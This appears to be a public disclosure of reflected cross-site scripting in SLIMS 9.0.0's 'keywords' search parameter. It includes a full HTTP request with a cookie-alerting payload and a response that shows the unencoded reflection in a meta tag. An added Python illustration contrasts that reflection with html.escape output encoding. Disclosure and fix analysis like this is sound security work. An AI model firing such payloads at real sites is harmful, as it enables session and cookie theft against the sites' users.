## Title: Senayan Library Management System (v9.0.0) a.k.a. SLIMS 9
Multiple reflected XSS vulnerabilities
## Author: nu11secur1ty
## Date: 12.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0
## Description:
The value of the `keywords` request parameter is copied into the value of an HTML tag attribute that is enclosed in double quotation marks.
The payload `m8vzl">alert(hello_vulnerability)hidhc` was submitted in the `keywords` parameter, and the application reflected this input unmodified in its response.
## STATUS: HIGH Vulnerability
[+] Payload:
```
GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl">alert(document.cookie)hidhc HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
[+] Response:
```
HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 06:23:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29492

<!--
# ===============================
# Classic SLiMS template
# ===============================
# @Author: Waris Agung Widodo
# @Email: [email protected]
# @Date: 2018-01-23T11:25:57+07:00
# @Last modified by: Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
-->
Senayan
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/>
<meta name="description" content="Open Source Library Management System | Senayan">
<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1">
<meta property="og:title" content="Open Source Library Management System | Senayan"/>
<meta property="og:description" content="Open Source Library Management System"/>
<meta property="og:url" content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl">alert(document.cookie)hidhc"/>
```
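The attribute-context reflection visible in the `og:url` meta tag above, as an added illustration that is not part of the advisory or of SLIMS's own code: a minimal model of the tag being rendered with the raw `keywords` value beside the attribute-encoded version, each checked with Python's HTML parser to see what becomes the attribute value and what spills out as page text. The render functions, the parser class and the URL prefix constant are assumptions written for this example.

```python
import html
from html.parser import HTMLParser

# Constructed values (hypothetical, for this example): the URL prefix the page
# puts in og:url, and the keywords value quoted in the advisory.
OG_URL_PREFIX = "//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords="
ADVISORY_KEYWORDS = 'm8vzl">alert(document.cookie)hidhc'


def render_og_url_vulnerable(keywords: str) -> str:
    """Model of the defective behaviour: the request parameter is concatenated
    into a double-quoted attribute with no encoding, so a '"' in it ends the
    attribute and a following '>' ends the tag."""
    return f'<meta property="og:url" content="{OG_URL_PREFIX}{keywords}"/>'


def render_og_url_fixed(keywords: str) -> str:
    """Attribute-context output encoding: with quote=True, html.escape turns
    '"' into &quot; and '>' into &gt;, so the value cannot leave the attribute.
    The browser still decodes the original characters as the attribute value."""
    return f'<meta property="og:url" content="{OG_URL_PREFIX}{html.escape(keywords, quote=True)}"/>'


class _ReflectionParser(HTMLParser):
    """Records the content attribute of each tag and any text that lands
    outside a tag; for this fragment such text means the attribute was broken out of."""

    def __init__(self) -> None:
        super().__init__()
        self.content_values: list = []
        self.leaked_text = ""

    def handle_starttag(self, tag, attrs):
        self.content_values.append(dict(attrs).get("content"))

    def handle_data(self, data):
        self.leaked_text += data


def reflection_check(fragment: str) -> dict:
    """Parse a rendered fragment the way a browser would and report what
    became the attribute value and what spilled out as page text."""
    parser = _ReflectionParser()
    parser.feed(fragment)
    parser.close()
    return {"content": parser.content_values[0] if parser.content_values else None,
            "leaked_text": parser.leaked_text}


if __name__ == "__main__":
    for name, render in (("vulnerable", render_og_url_vulnerable), ("fixed", render_og_url_fixed)):
        result = reflection_check(render(ADVISORY_KEYWORDS))
        print(name, "-> leaked text:", repr(result["leaked_text"]))
```

For the vulnerable rendering the parser reports `alert(document.cookie)hidhc"/>` as page text outside any tag; for the fixed rendering the leaked text is empty and the whole keywords value is the attribute.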
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)
## Evidence and Exploit
[href](https://streamable.com/ac60v3)
## Time spent
`01:00:00`